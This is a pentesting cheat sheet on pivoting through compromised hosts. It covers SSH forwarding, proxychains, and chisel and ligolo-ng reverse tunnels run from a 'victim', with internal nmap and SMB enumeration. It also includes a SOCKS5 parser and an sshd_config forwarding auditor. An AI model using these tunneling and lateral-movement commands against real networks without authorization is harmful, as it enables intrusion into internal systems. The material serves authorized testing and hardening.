CyberCheatsheets

Pivoting & Tunneling Cheat Sheet

SSH tunneling, port forwarding, SOCKS proxies, and pivoting with chisel/ligolo to reach internal networks during authorized engagements.

Category: Network & Protocol. Tags: lateral-movement, pivoting, port-forwarding, proxychains, ssh-tunneling. Updated 2026-06-17

Overview

Pivoting routes your traffic through a compromised host to reach networks you can't touch directly. The core primitives are local, remote, and dynamic (SOCKS) port forwarding. SSH covers most cases; chisel and ligolo-ng handle Windows and restrictive environments. Pair a SOCKS proxy with proxychains to run any tool through the tunnel.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

SSH local forwarding (-L)

Reach the pivot's localhost:80 via your localhost:8080

ssh -L 8080:127.0.0.1:80 user@pivot

Reach an internal host (10.0.0.5) behind the pivot

ssh -L 3306:10.0.0.5:3306 user@pivot

Bind to all interfaces so teammates can use it

ssh -L 0.0.0.0:8080:10.0.0.5:80 user@pivot

SSH remote forwarding (-R)

Expose a service on the victim back to your box (e.g. catch a reverse shell)

ssh -R 9001:127.0.0.1:9001 user@yourbox

Remote dynamic SOCKS — proxy from your box into the victim's network (client-side feature, needs OpenSSH 7.6+ on the client only; the listener on yourbox speaks SOCKS)

ssh -R 1080 user@yourbox

SSH dynamic SOCKS (-D)

Open a SOCKS proxy on :1080 routing through the pivot

ssh -D 1080 user@pivot

Background it (-f), no shell (-N)

ssh -D 1080 -N -f user@pivot

Run tools through the SOCKS proxy

proxychains nmap -sT -Pn 10.0.0.0/24

proxychains setup

Set 'socks5 127.0.0.1 1080' at the end of the config

grep -E 'socks|dynamic' /etc/proxychains4.conf

Quiet mode through the proxy

proxychains -q curl http://10.0.0.5/

Tunnel SMB enumeration into the internal net

proxychains crackmapexec smb 10.0.0.0/24
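What `ssh -D`, chisel `R:socks` and proxychains actually exchange on the wire is a SOCKS5 CONNECT request (RFC 1928). The encoder/decoder below is an added example, not code from the cheat sheet or from any of the tools it lists; the sample values (10.0.0.5, intranet.example) are constructed. The point it makes concrete is the address type byte: ATYP 0x01 means the client already resolved the name itself, so the DNS lookup happened outside the tunnel, while ATYP 0x03 hands the hostname to the proxy so the pivot resolves it. That is the behaviour proxychains' `proxy_dns` option exists to force, and it is why a SOCKS-only pivot carries nothing but TCP CONNECTs.

```python
"""Minimal SOCKS5 CONNECT request encoder/decoder (RFC 1928).

Added example, not part of the original cheat sheet. Sample hosts/ports
used in the tests are constructed.
"""
import ipaddress
import struct

SOCKS_VERSION = 0x05
CMD_CONNECT = 0x01          # the only command proxychains needs (TCP)
ATYP_IPV4 = 0x01
ATYP_DOMAIN = 0x03          # proxy resolves the name; no local DNS leak
ATYP_IPV6 = 0x04


def client_greeting() -> bytes:
    """Version identifier/method selection: offer one method, 'no auth'."""
    return bytes([SOCKS_VERSION, 1, 0x00])


def build_connect_request(host: str, port: int) -> bytes:
    """Encode a CONNECT request.

    Literal IPs are sent as ATYP 1/4; anything else is sent as ATYP 3 so the
    proxy (the pivot) performs the DNS lookup.
    """
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5 (1-byte length)")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    else:
        atyp = ATYP_IPV4 if ip.version == 4 else ATYP_IPV6
        addr = bytes([atyp]) + ip.packed
    header = struct.pack("!BBB", SOCKS_VERSION, CMD_CONNECT, 0x00)  # VER CMD RSV
    return header + addr + struct.pack("!H", port)


def parse_connect_request(data: bytes) -> dict:
    """Decode a CONNECT request as a SOCKS server would.

    Returns atyp, host, port and whether the proxy must resolve the name
    itself (True only for ATYP 3). Rejects non-CONNECT commands, unknown
    address types and truncated/trailing bytes.
    """
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 request")
    if data[1] != CMD_CONNECT:
        raise ValueError(f"unsupported command {data[1]:#x} (only CONNECT/TCP)")
    atyp = data[3]
    if atyp == ATYP_IPV4:
        end = 4 + 4
        host = str(ipaddress.IPv4Address(data[4:end]))
    elif atyp == ATYP_IPV6:
        end = 4 + 16
        host = str(ipaddress.IPv6Address(data[4:end]))
    elif atyp == ATYP_DOMAIN:
        end = 5 + data[4]
        host = data[5:end].decode("idna")
    else:
        raise ValueError(f"unknown address type {atyp:#x}")
    if len(data) != end + 2:
        raise ValueError("truncated or trailing bytes in request")
    (port,) = struct.unpack("!H", data[end:end + 2])
    return {
        "atyp": atyp,
        "host": host,
        "port": port,
        "proxy_resolves_name": atyp == ATYP_DOMAIN,
    }


if __name__ == "__main__":
    for target in ("10.0.0.5", "intranet.example"):
        req = build_connect_request(target, 445)
        print(req.hex(), parse_connect_request(req))
```

If you capture traffic between proxychains and the SOCKS listener and see only ATYP 0x01 requests for hosts you addressed by name, name resolution is happening on the operator side rather than through the pivot.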

chisel (when SSH isn't available)

On your box: start the chisel server

chisel server -p 8000 --reverse

On the victim: reverse SOCKS back to you (proxy on :1080)

chisel client 10.10.14.5:8000 R:socks

Reverse port-forward a single internal service

chisel client 10.10.14.5:8000 R:3306:10.0.0.5:3306

ligolo-ng (modern, no proxychains)

On your box: start the ligolo proxy

./proxy -selfcert -laddr 0.0.0.0:11601

On the victim: connect the agent

./agent -connect 10.10.14.5:11601 -ignore-cert

On your box: bring up the tun interface and route the target subnet

sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.0.0.0/24 dev ligolo  # then select the agent with 'session' and run 'start' in the ligolo proxy console

Tips

  • -L pulls a remote service to you; -R pushes a local service to them; -D gives a SOCKS proxy for everything.
  • proxychains only relays TCP connect() calls from dynamically linked programs, so ICMP ping, SYN scans and UDP never enter the tunnel — use nmap -sT -Pn through SOCKS.
  • ligolo-ng routes a whole subnet over a tun interface, so tools work natively (no proxychains).
  • Chain pivots: a second SOCKS through the first reaches networks two hops deep.
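Every SSH forwarding mode on this page is governed by a handful of sshd_config directives on the pivot (AllowTcpForwarding for -L/-R/-D, GatewayPorts for -R listeners bound beyond localhost, PermitTunnel for ssh -w, PermitOpen/PermitListen for destination and listen restrictions). The auditor below is an added example, not part of the cheat sheet, and the config it parses is constructed. It applies two sshd parsing rules that catch people out: keywords are case-insensitive, and for each keyword the first occurrence wins, so a hardening line appended to the bottom of the file does nothing if an earlier line already set the value. Settings inside Match blocks are reported separately because they apply only to matching sessions.

```python
"""Audit sshd_config for the directives that enable SSH pivoting.

Added example, not part of the original cheat sheet. SAMPLE_SSHD_CONFIG is
constructed and does not describe any real host.
"""
import shlex

# OpenSSH defaults used when a directive is absent from the file.
DEFAULTS = {
    "allowtcpforwarding": "yes",   # -L / -R / -D channels
    "gatewayports": "no",          # 'yes': -R listeners may bind all interfaces
    "permittunnel": "no",          # layer-2/3 tun forwarding (ssh -w)
    "permitopen": "any",           # destinations allowed for -L / -D
    "permitlisten": "any",         # ports allowed for -R
}


def parse_sshd_config(text: str) -> dict:
    """Parse sshd_config with first-occurrence-wins semantics per scope.

    Returns {'global': {kw: value}, 'match': [(criteria, {kw: value})],
    'shadowed': [(kw, ignored_value, effective_value)]}.
    """
    cfg = {"global": {}, "match": [], "shadowed": []}
    scope = cfg["global"]
    for raw in text.splitlines():
        parts = shlex.split(raw, comments=True)      # drops blank/comment lines
        if not parts:
            continue
        if len(parts) == 1 and "=" in parts[0]:       # 'Keyword=value' form
            parts = parts[0].split("=", 1)
        kw, value = parts[0].lower(), " ".join(parts[1:])
        if kw == "match":                             # everything after a Match
            scope = {}                                # line belongs to that block
            cfg["match"].append((value, scope))
            continue
        if kw in scope:
            cfg["shadowed"].append((kw, value, scope[kw]))  # later duplicate ignored
        else:
            scope[kw] = value
    return cfg


def effective_settings(text: str) -> dict:
    """Global effective value (lower-cased) of each forwarding directive."""
    g = parse_sshd_config(text)["global"]
    return {kw: g.get(kw, default).lower() for kw, default in DEFAULTS.items()}


def audit(text: str) -> list:
    """Return human-readable findings; an empty list means no forwarding
    primitive is globally available and nothing is shadowed."""
    cfg = parse_sshd_config(text)
    eff = {kw: cfg["global"].get(kw, d) for kw, d in DEFAULTS.items()}
    findings = []
    if eff["allowtcpforwarding"].lower() == "yes":
        findings.append("AllowTcpForwarding yes: -L, -R and -D available to every user")
    if eff["gatewayports"].lower() != "no":
        findings.append(f"GatewayPorts {eff['gatewayports']}: -R listeners may bind to all interfaces")
    if eff["permittunnel"].lower() != "no":
        findings.append(f"PermitTunnel {eff['permittunnel']}: tun-based tunnels (ssh -w) allowed")
    if eff["allowtcpforwarding"].lower() != "no" and eff["permitopen"].lower() == "any":
        findings.append("PermitOpen any: no destination restriction on -L / -D")
    for kw, ignored, used in cfg["shadowed"]:
        findings.append(f"{kw} {ignored} is ignored: first occurrence ({used}) wins")
    for criteria, scope in cfg["match"]:
        for kw, value in scope.items():
            if kw in DEFAULTS:
                findings.append(f"Match {criteria}: {kw} {value} applies only to matching sessions")
    return findings


# Constructed sample: forwarding enabled, a no-op hardening line, a Match block.
SAMPLE_SSHD_CONFIG = """\
# constructed sample, not a real host's config
Port 22
AllowTcpForwarding yes
GatewayPorts yes
# appended hardening: has no effect, the earlier line wins
AllowTcpForwarding no
Match User deploy
    AllowTcpForwarding no
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_SSHD_CONFIG):
        print("-", finding)
```

Run it against `/etc/ssh/sshd_config` on hosts that should never act as a pivot; `sshd -T` prints the effective configuration and is the authoritative cross-check, since this parser does not evaluate Match criteria or Include directives.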
